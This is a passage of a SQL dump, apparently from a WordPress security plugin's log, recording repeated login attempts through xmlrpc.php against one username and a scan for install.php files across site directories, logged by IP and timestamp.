2m8qUgeGxKSbJ','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('156.96.151.132',2623575940,'techspt',0,1681653975.8228,152,'dAZLEH41v6I0CBTS23thofDu','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('213.152.161.244',3583549940,'techspt',0,1681655862.9878,152,'PTxkAVKt2BZ3EeYomXNMR61j','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.101.161.81',1734713681,'techspt',0,1681656654.7142,152,'ZiGldPUYEenM0zaXqfx6tHrR','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('192.64.117.65',3225449793,'techspt',0,1681656656.0560,152,'vWDOadznUt9Be1SmrkJIHfNP','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('82.165.86.47',1386567215,'techspt',0,1681656660.1492,152,'9iU4LRr7InW5ucwOoXsabH8x','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('5.39.4.40',86443048,'techspt',0,1681656675.2454,152,'y1m8DQ4aRUC2sPbxqceFO9lX','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('178.32.187.122',2988489594,'techspt',0,1681656675.3975,152,'of47iqgsxRzP2ap6DUcTAeOn','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('5.9.59.22',84491030,'techspt',0,1681656791.2717,152,'mYg5wGFK3kh1XirPDOoalxVd','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('51.195.124.72',868449352,'techspt',0,1681656796.5971,152,'WuNH1CfwhGIcnyBgze3qdsSa','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('182.50.151.70',3056768838,'techspt',0,1681656798.0068,152,'JU0Vf3mlxMOZ1ytKEpnC4RgI','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('109.94.209.234',1834930666,'techspt',0,1681656813.6345,152,'H50hUIECkGx2lVsgiZaey3vF','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('14.225.192.104',249675880,'techspt',0,1681656816.5283,152,'MHZpwNOxkcLDIA1RvyCQTW6i','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('149.127.214.172',2508183212,'techspt',0,1681656817.3916,152,'kl3DLd8hnAR5X9qjOFHKtZNG','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('75.119.135.6',1266124550,'techspt',0,1681656824.7203,152,'5uFncLSi7oJfIl9GsbDCvKgA','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('82.130.0.72',1384251464,'techspt',0,1681656832.1531,152,'RwQ7rOVip4NB3KSZdvzLPahM','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('178.32.201.69',2988493125,'techspt',0,1681656834.3560,152,'5mwAxeOpP8ashqiYdXNfMT7I','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('54.36.174.113',908373617,'techspt',0,1681657472.0750,152,'Sk5RIt0yEV9JCxijTYorG4Wb','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('60.205.227.183',1020126135,'techspt',0,1681657472.2428,152,'p4SjAIklVqrORYQagDN08mub','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('108.170.11.42',1823083306,'techspt',0,1681657473.4470,152,'hnFQjbe37cf6ilGNSsoMzupL','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('208.109.61.155',3496820123,'techspt',0,1681657474.4216,152,'1PRXnN8Lt2Iu0aEzUf6BbCvW','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('128.199.67.142',2160542606,'techspt',0,1681657482.0817,152,'qDX2NzT957dxeAjsp0ZhPgaK','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('62.102.148.160',1046910112,'techspt',0,1681659974.3697,152,'nfDBUlQRgbpAVjhwzXTO5ria','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('114.215.93.65',1926716737,'techspt',0,1681674089.3058,152,'CAq3PdIpXrMj1yJvFgVbi94R','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('199.59.90.4',3342555652,'techspt',0,1681674091.3560,152,'AHmd9nXbcuGWLirJ6ptUlxhj','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('47.243.171.230',804498406,'techspt',0,1681674099.0956,152,'yqoDmh9WMNJXRi7zPsTeGAC4','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('81.88.53.33',1364735265,'techspt',0,1681674681.3049,152,'DPw6z03FdGuUq2bBhMK5JoWV','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('204.93.196.26',3428697114,'techspt',0,1681674682.0142,152,'fWgkZF0hMYm6cO3uHCTrp2Io','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('209.205.218.106',3519928938,'techspt',0,1681674683.3284,152,'h5QtAYDe3bwFHsNyUji9TPfz','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('101.50.2.67',1697776195,'techspt',0,1681674688.3804,152,'6rwNxuzf9VoTyYHhIGvEeWpM','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('199.16.131.160',3339748256,'techspt',0,1681674693.4288,152,'Jm6xyRsqCMLkZ5KhvpBjWPde','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('34.87.13.139',576130443,'techspt',0,1681674697.4763,152,'tPBy0Q53mCXc94ZsWgjYD12q','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('50.31.160.250',840933626,'techspt',0,1681674701.7238,152,'6cZ7uaC5GWbgS4vXHAOojkJF','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('14.225.192.104',249675880,'techspt',0,1681674703.2349,152,'jJR1nPk03h5vIpCmErzFLiOe','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('5.161.122.207',94468815,'techspt',0,1681674709.4176,152,'7VIv4KB9tmG6eNoc3TOhpgDk','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('37.187.1.231',633012711,'techspt',0,1681674716.1434,152,'0hdgepH5sY7VkqXEc6ubPUQ2','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('178.162.204.214',2997013718,'techspt',0,1681675472.7459,152,'D78A2a3niozhdFfCsyWIZgv5','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('213.152.162.149',3583550101,'techspt',0,1681676919.5831,152,'NEerGWH2zcCbAZd5mls1Q86u','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('43.155.103.11',731604747,'techspt',0,1681678692.6309,152,'Upmbyx5YJgXOqvRjKN9LrP0n','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('198.71.235.55',3326602039,'techspt',0,1681678693.3123,152,'QiNlzAgsJd7LUuFpKn58cvhM','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('18.218.139.173',316312493,'techspt',0,1681678694.6645,152,'aSG3D2KEe0gYLqpBcCyhobW7','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('103.171.180.165',1739306149,'techspt',0,1681678701.3461,152,'uo2Az4XMSJfeisgZmGLyVhIB','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('144.76.74.227',2420919011,'techspt',0,1681678705.8283,152,'kWgvOdaNVfQnZIqDe12jH6rt','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('182.50.151.70',3056768838,'techspt',0,1681678706.9719,152,'0sWCVR1jnN9ULezuOZol5T36','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('59.106.222.53',996859445,'techspt',0,1681678714.1436,152,'esbQp7DTFRSoaq1kldPwML8h','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('18.218.139.173',316312493,'techspt',0,1681678721.5239,152,'LvnYi2asTVpFOZljofUSdCrB','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('18.218.139.173',316312493,'',0,1681678721.5286,10,'LvnYi2asTVpFOZljofUSdCrB','','701|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,701,0),('188.68.47.117',3158585205,'techspt',0,1681678731.2710,152,'CtIHQfKMUNnPj86EOZ4ks2Td','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('217.70.186.133',3645291141,'techspt',0,1681678777.9959,152,'GOKrcIZVXqkExAdW6Li9PRSn','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('62.102.148.189',1046910141,'techspt',0,1681679067.4807,152,'PMpW6Ba72ygOUiXl9GTSukbx','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('167.86.123.58',2807462714,'techspt',0,1681679650.7525,152,'ArzND6tlaY3iJpQhgFHZKRdq','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('47.243.171.230',804498406,'techspt',0,1681679651.6653,152,'dpBYgaezqlD7S06LcOH1ot3b','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.101.161.81',1734713681,'techspt',0,1681679656.8359,152,'b9dEt0usRYG3UBwI15lCrxvz','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('199.59.90.4',3342555652,'techspt',0,1681679660.1181,152,'VjuCp4AY96aWBQZ2mv8ltJ3g','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('47.243.171.230',804498406,'techspt',0,1681679667.7822,152,'34rQDg0Flny9fsq7AvUIZbHE','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('47.243.171.230',804498406,'',0,1681679667.7888,10,'34rQDg0Flny9fsq7AvUIZbHE','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('52.69.122.222',876968670,'techspt',0,1681679675.6742,152,'6dPb2q9onNGmI4hEULYTBSvt','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('101.34.78.12',1696747020,'techspt',0,1681679684.8244,152,'OKAxRfhmyEjkuwiNz1LCbJ7c','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('66.42.49.228',1110061540,'techspt',0,1681679697.6713,152,'PY32XLwdjGWvqbg1iJoVyCZr','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('89.33.44.247',1495346423,'',0,1681680608.8631,55,'wkDEpUdKXsqB49SuM7RQmrLA','','19|0|0|0|cmdev-site1.com/wp-admin/includes/install.php',0,19,0),('89.33.44.247',1495346423,'',0,1681680610.6339,55,'4iS1wgQWhefK50kxdRlJv3FZ','','19|0|0|0|cmdev-site1.com/wp-includes/install.php',0,19,0),('89.33.44.247',1495346423,'',0,1681680610.6382,10,'4iS1wgQWhefK50kxdRlJv3FZ','','707|0|0|0|cmdev-site1.com/wp-includes/install.php',0,707,0),('89.33.44.247',1495346423,'',0,1681680613.7178,55,'a7FKrJhRMpIc6TOgtm40Uo5E','','19|0|0|0|cmdev-site1.com/css/install.php',0,19,0),('89.33.44.247',1495346423,'',0,1681680616.3824,55,'gX5uksEZ7eH294DpaP8bVGTM','','19|0|0|0|cmdev-site1.com/images/install.php',0,19,0),('89.33.44.247',1495346423,'',0,1681680618.5555,55,'FbYRglIhHz2j1rqZWQSABKEG','','19|0|0|0|cmdev-site1.com/wp-content/languages/plugins/install.php',0,19,0),('89.33.44.247',1495346423,'',0,1681680620.4788,55,'SzOimEQMXj8hVNGkealBnH6t','','19|0|0|0|cmdev-site1.com/wp-includes/images/install.php',0,19,0),('89.33.44.247',1495346423,'',0,1681680622.2190,55,'vo2FASsO89Vi5Kpq4YcmMuxl','','19|0|0|0|cmdev-site1.com/wp-admin/user/install.php',0,19,0),('89.33.44.247',1495346423,'',0,1681680623.9566,55,'Cb5Rtsm3qWNvDXOJ2I6y8Y9c','','19|0|0|0|cmdev-site1.com/wp-content/languages/install.php',0,19,0),('89.33.44.247',1495346423,'',0,1681680625.7043,55,'t1f7RyMmbu43oCJn5Lqz0jFO','','19|0|0|0|cmdev-site1.com/wp-content/upgrade/install.php',0,19,0),('89.33.44.247',1495346423,'',0,1681680627.5133,55,'nC3oeYFp2yHsczK9XgqTmWNk','','19|0|0|0|cmdev-site1.com/wp-content/uploads/install.php',0,19,0),('89.33.44.247',1495346423,'',0,1681680629.4171,55,'zMtGhNdIfTWOcxbauZpC9nr1','','19|0|0|0|cmdev-site1.com/wp-admin/network/install.php',0,19,0),('89.33.44.247',1495346423,'',0,1681680631.1866,55,'kF2Ry53XCSjUEIGMesHz4bPB','','19|0|0|0|cmdev-site1.com/wp-admin/js/install.php',0,19,0),('89.33.44.247',1495346423,'',0,1681680633.0747,55,'pJ35Q6m2k7TtHCvyqzWwDYxc','','19|0|0|0|cmdev-site1.com/wp-admin/css/install.php',0,19,0),('89.33.44.247',1495346423,'',0,1681680634.9973,55,'gzbYiGjN1aoLrvfQKSVByxRO','','19|0|0|0|cmdev-site1.com/wp-admin/css/colors/install.php',0,19,0),('89.33.44.247',1495346423,'',0,1681680636.8663,55,'WkUwJ2jr70uzg9Madqxl5Bhp','','19|0|0|0|cmdev-site1.com/wp-admin/maint/install.php',0,19,0),('89.33.44.247',1495346423,'',0,1681680638.5089,55,'DfbUNwzv9VYsZcPChp7JEn1k','','19|0|0|0|cmdev-site1.com/wp-content/install.php',0,19,0),('89.33.44.247',1495346423,'',0,1681680640.2367,55,'j6GCXFbQhBopD5qJg4Omdiry','','19|0|0|0|cmdev-site1.com/wp-admin/css/colors/blue/install.php',0,19,0),('89.33.44.247',1495346423,'',0,1681680641.8969,55,'XD2nkxEmA1VbqKjwlodU49fG','','19|0|0|0|cmdev-site1.com/wp-admin/css/colors/coffee/install.php',0,19,0),('89.33.44.247',1495346423,'',0,1681680643.6136,55,'DqxO64iTEVmuSpQdg18fKokP','','19|0|0|0|cmdev-site1.com/wp-admin/css/colors/ectoplasm/install.php',0,19,0),('89.33.44.247',1495346423,'',0,1681680645.3810,55,'CJXpoU9D1lOWYgHKhStwQ2zm','','19|0|0|0|cmdev-site1.com/wp-admin/css/colors/midnight/install.php',0,19,0),('89.33.44.247',1495346423,'',0,1681680647.0380,55,'DAher7PNG8BtfzViwMXyCR90','','19|0|0|0|cmdev-site1.com/wp-admin/css/colors/modern/install.php',0,19,0),('89.33.44.247',1495346423,'',0,1681680649.8538,55,'UcYgej32LvawxMtr7lZuAzEy','','19|0|0|0|cmdev-site1.com/wp-admin/images/install.php',0,19,0),('89.33.44.247',1495346423,'',0,1681680651.5801,55,'Gz1YTiaU04kunImBH9ldyQZW','','19|0|0|0|cmdev-site1.com/wp-admin/css/colors/ocean/install.php',0,19,0),('89.33.44.247',1495346423,'',0,1681680654.1333,55,'T2tsCEhYNuK1c7RxywaX6OrV','','19|0|0|0|cmdev-site1.com/wp-admin/js/widgets/install.php',0,19,0),('89.33.44.247',1495346423,'',0,1681680655.8842,55,'6swQdq3gmnZEoUaACb9eST2J','','19|0|0|0|cmdev-site1.com/wp-includes/customize/install.php',0,19,0),('89.33.44.247',1495346423,'',0,1681680657.6930,55,'hXRtTzZ7vigG8Of1QlNrBD2e','','19|0|0|0|cmdev-site1.com/wp-includes/pomo/install.php',0,19,0),('89.33.44.247',1495346423,'',0,1681680659.4335,55,'PhnypxMkmegdEtR4ZrXB0fOU','','19|0|0|0|cmdev-site1.com/wp-includes/ID3/install.php',0,19,0),('89.33.44.247',1495346423,'',0,1681680661.0827,55,'roTXVGsdlhA9OZMHzpLtnbu6','','19|0|0|0|cmdev-site1.com/wp-includes/IXR/install.php',0,19,0),('89.33.44.247',1495346423,'',0,1681680662.7468,55,'nivzw5oKT27XSVtDIkFgl1mu','','19|0|0|0|cmdev-site1.com/wp-includes/PHPMailer/install.php',0,19,0),('89.33.44.247',1495346423,'',0,1681680664.4389,55,'1eBxOEGbTLsDt6XNHdPKQpyR','','19|0|0|0|cmdev-site1.com/wp-includes/Requests/install.php',0,19,0),('89.33.44.247',1495346423,'',0,1681680666.1825,55,'t4zP2nVh8HADQrGLbYIxkFfT','','19|0|0|0|cmdev-site1.com/wp-includes/SimplePie/install.php',0,19,0),('89.33.44.247',1495346423,'',0,1681680667.7691,55,'NL9eFX8Uv7lHDqyCjsm1uk2o','','19|0|0|0|cmdev-site1.com/wp-includes/Text/install.php',0,19,0),('89.33.44.247',1495346423,'',0,1681680669.5418,55,'J2BUn5I8s0vtXTfxLFlYDOp4','','19|0|0|0|cmdev-site1.com/wp-includes/assets/install.php',0,19,0),('89.33.44.247',1495346423,'',0,1681680671.7726,55,'Lyh6JV8lZa97NPCe42tzFW3b','','19|0|0|0|cmdev-site1.com/wp-includes/block-patterns/install.php',0,19,0),('89.33.44.247',1495346423,'',0,1681680673.4553,55,'3BvZT8V0HuKeG9NqwsxW45Yl','','19|0|0|0|cmdev-site1.com/wp-includes/block-supports/install.php',0,19,0),('89.33.44.247',1495346423,'',0,1681680675.1135,55,'S4jODL539fFvlRc1PATsCrhn','','19|0|0|0|cmdev-site1.com/wp-includes/blocks/install.php',0,19,0),('89.33.44.247',1495346423,'',0,1681680676.9761,55,'jys1rnVT5plW7LuGaH9CKRYq','','19|0|0|0|cmdev-site1.com/wp-includes/certificates/install.php',0,19,0),('89.33.44.247',1495346423,'',0,1681680678.6167,55,'vXNduEyK7Qsh3LYB02giSnxC','','19|0|0|0|cmdev-site1.com/wp-includes/css/install.php',0,19,0),('89.33.44.247',1495346423,'',0,1681680680.3209,55,'hE32NF9jTvH4WucnsIoVb0el','','19|0|0|0|cmdev-site1.com/wp-includes/fonts/install.php',0,19,0),('89.33.44.247',1495346423,'',0,1681680681.9764,55,'ENIt6gcuFOPqYVLQdRlZn1G0','','19|0|0|0|cmdev-site1.com/wp-includes/js/install.php',0,19,0),('89.33.44.247',1495346423,'',0,1681680684.0677,55,'CI37qpcV2wJxedMkPYnUXFSr','','19|0|0|0|cmdev-site1.com/wp-includes/php-compat/install.php',0,19,0),('89.33.44.247',1495346423,'',0,1681680686.1697,55,'Hpe1Zoc9IbNqJmkvQPrBtVuW','','19|0|0|0|cmdev-site1.com/wp-includes/random_compat/install.php',0,19,0),('89.33.44.247',1495346423,'',0,1681680687.8738,55,'jCI3QpcB1xXGfJ9FDtelh8wb','','19|0|0|0|cmdev-site1.com/wp-includes/rest-api/install.php',0,19,0),('89.33.44.247',1495346423,'',0,1681680689.5615,55,'ACjSJZkHEXrs2YM7fqh3PbQl','','19|0|0|0|cmdev-site1.com/wp-includes/sitemaps/install.php',0,19,0),('89.33.44.247',1495346423,'',0,1681680691.2297,55,'LB0QNMAroZjRuk7xWibDwItH','','19|0|0|0|cmdev-site1.com/wp-includes/sodium_compat/install.php',0,19,0),('89.33.44.247',1495346423,'',0,1681680692.8666,55,'lny0QrcWARsVemdOx827HUbT','','19|0|0|0|cmdev-site1.com/wp-includes/style-engine/install.php',0,19,0),('89.33.44.247',1495346423,'',0,1681680694.4587,55,'dTgcvreFR2qa57kiS4Wm1MXf','','19|0|0|0|cmdev-site1.com/wp-includes/theme-compat/install.php',0,19,0),('89.33.44.247',1495346423,'',0,1681680696.1422,55,'4LMuxZVrCBX0qcDl5as2KR6d','','19|0|0|0|cmdev-site1.com/wp-includes/widgets/install.php',0,19,0),('185.2.5.88',3103917400,'techspt',0,1681683073.1804,152,'eGWZyT54Fqm9xsjuPpiXdVNC','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('144.76.74.227',2420919011,'techspt',0,1681683073.2408,152,'0QVmh4OwTPiJsZakKHfxSogI','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('72.167.57.16',1218918672,'techspt',0,1681683075.9101,152,'49ybFwlf6PWsBZAn7CQi1qgJ','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('72.167.57.16',1218918672,'',0,1681683075.9162,10,'49ybFwlf6PWsBZAn7CQi1qgJ','','701|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,701,0),('198.54.124.210',3325459666,'techspt',0,1681683079.8661,152,'tGZNpSoTJ0BQfIb4LiXKqM1u','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('91.204.46.73',1540107849,'techspt',0,1681683080.9161,152,'GpWtkXuvZAI4cOQn25gwfxjd','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('51.132.254.35',864353827,'techspt',0,1681683085.3659,152,'8ZujwaAlbM0LJCmvIXryd5z6','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('160.153.155.29',2694421277,'techspt',0,1681685615.8658,152,'SPTz8WhJAxak9eKugcsjDNR7','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('43.155.116.117',731608181,'techspt',0,1681685616.5851,152,'FSoE7JGzmftTHgOiw6DWlM2v','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('66.42.49.228',1110061540,'techspt',0,1681685618.5270,152,'IJfgGnNRULmzqMovKk6DshYw','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('95.167.178.158',1604825758,'techspt',0,1681685621.6457,152,'su8WjI2oM4DryZ90YqnQdP7T','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('52.69.122.222',876968670,'techspt',0,1681685630.3201,152,'YqxsTf8aGetJHdLzo5IpV4yk','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('5.9.59.22',84491030,'techspt',0,1681685631.4635,152,'nP4oqDKlgExetAa1u9TFWLvr','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('198.71.52.97',3326555233,'techspt',0,1681685640.5945,152,'VuOIE5GvBp08goUP3TFCjmQL','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('178.62.105.205',2990434765,'',0,1681687202.9428,10,'uzDClpifYh1UFWcJbKev7tGT','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('140.210.206.84',2362625620,'techspt',0,1681687208.1705,152,'8B0fpHK3DRU1xauV62YzvyNq','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.101.161.81',1734713681,'techspt',0,1681687211.4527,152,'LhvGEObNPWRd89oI1Ht0quMj','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('157.230.250.100',2649160292,'techspt',0,1681687212.3944,152,'3trU5bQkAwhW6B0Xl8Zm9vLn','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('51.161.94.36',866213412,'techspt',0,1681687220.8049,152,'OsIbwVeAZT9hEUGjkcufodHx','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('43.155.116.117',731608181,'techspt',0,1681687225.1315,152,'hny67bR4FSBfUT1XjOP93WLK','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('43.155.116.117',731608181,'',0,1681687225.1347,10,'hny67bR4FSBfUT1XjOP93WLK','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('199.59.90.4',3342555652,'techspt',0,1681687228.5821,152,'nER4pIuYoQbZyhA7P3FBH9gc','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('104.236.7.86',1760298838,'techspt',0,1681687235.3115,152,'sg2Or1nYS6JVxqXFtiWPl4MC','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('43.155.116.117',731608181,'',0,1681687239.0687,71,'m7dPa2jf43B5OYnEbkgTSXhD','','13|0|0|0|cmdev-site1.com/xmlrpc.php',0,13,0),('75.119.135.6',1266124550,'techspt',0,1681687413.4821,152,'7SQVzt2RH0bwiBe5xEpy8MPJ','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('103.221.223.238',1742594030,'techspt',0,1681687414.1636,152,'kNouz2ZWMXC4wASepKbUv9Is','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('103.146.176.238',1737666798,'techspt',0,1681687416.2529,152,'NXP3C2jrqe0AKTFvnw5shoVb','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('34.87.13.139',576130443,'techspt',0,1681687424.6591,152,'cMIok6p9uQNmx7riASnzwaPh','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('34.87.13.139',576130443,'techspt',0,1681687425.1879,152,'DtsZfkzNGU41HBY0CTm958ro','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('34.87.13.139',576130443,'',0,1681687425.1919,10,'DtsZfkzNGU41HBY0CTm958ro','','701|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,701,0),('72.167.57.16',1218918672,'techspt',0,1681687431.5197,152,'DEUKMbxiTmu3heGICLB2j5Rq','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('138.186.9.114',2327447922,'techspt',0,1681687434.9016,152,'XAGmQkDuHVUY7PhsnLTyzKiR','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('45.150.149.86',764843350,'techspt',0,1681687436.6539,152,'5D2MOvhqnHVYtTb4SJfCNB6A','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('14.225.192.104',249675880,'techspt',0,1681687438.4631,152,'puKxLSnlTJMAFzB1X8jamQWy','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('92.205.2.176',1556939440,'techspt',0,1681687440.1867,152,'qpUZ9FbDCcJEPwNdIGk35aBm','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('198.23.58.160',3323411104,'techspt',0,1681687446.2975,152,'omWCyGs29jEhcviNrkQ8BnP5','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('87.101.92.171',1466260651,'techspt',0,1681689150.3837,152,'C7RSIx4dgjneaGPyZFrlB02c','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('14.225.192.104',249675880,'techspt',0,1681692131.6709,152,'d1HN4BMSZ58q6DisbKRg0c9W','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('103.171.180.165',1739306149,'techspt',0,1681692132.2034,152,'qFvVBK9A0PfgpISOZ4HNjxRC','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('103.171.180.165',1739306149,'',0,1681692132.2065,10,'qFvVBK9A0PfgpISOZ4HNjxRC','','701|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,701,0),('77.220.104.89',1306290265,'techspt',0,1681692137.5742,152,'39MGYe4o6mwdZT8iyIHzncP1','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('185.2.5.88',3103917400,'techspt',0,1681692137.8939,152,'jW6OPJf7dlonbrcRUA05qILk','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('72.167.57.16',1218918672,'techspt',0,1681692146.6215,152,'8wL6xak5OnPKjRlITmGsY1yV','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('34.87.13.139',576130443,'techspt',0,1681692150.5120,152,'AFjDhtpUK5WXe4YRsSG8fmMb','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('185.25.23.45',3105429293,'techspt',0,1681692156.7327,152,'y6lhNb30vPeH4ZULd7FiXQgx','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('103.171.90.148',1739283092,'techspt',0,1681692167.5493,152,'0ibAmhUGgojx7pJV3XI6HWnu','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('46.38.249.174',774306222,'techspt',0,1681692176.9272,152,'uX5rkDqplSwmiW7O0oYMnQG8','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('139.59.125.187',2335931835,'techspt',0,1681692180.8457,152,'GsLwMahiQZXSzndV0BImW4bO','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('192.64.117.65',3225449793,'techspt',0,1681692190.1965,152,'xEfuaH4LQsZz3thJnkRe5oT7','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('82.223.115.237',1390375917,'techspt',0,1681692197.9347,152,'uxZe40aC7hbRwO2YG31mlTtd','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.101.161.81',1734713681,'techspt',0,1681692200.4547,152,'cf7Ryhm8KdxH5DFMvzil1gaA','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('139.59.104.143',2335926415,'techspt',0,1681692213.6435,152,'MhoPieEKdRWBCbHNkctIa4lD','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('82.223.115.237',1390375917,'techspt',0,1681692219.0758,152,'zJDIPuRt5AgfT1068Ojie9bY','','0|0|0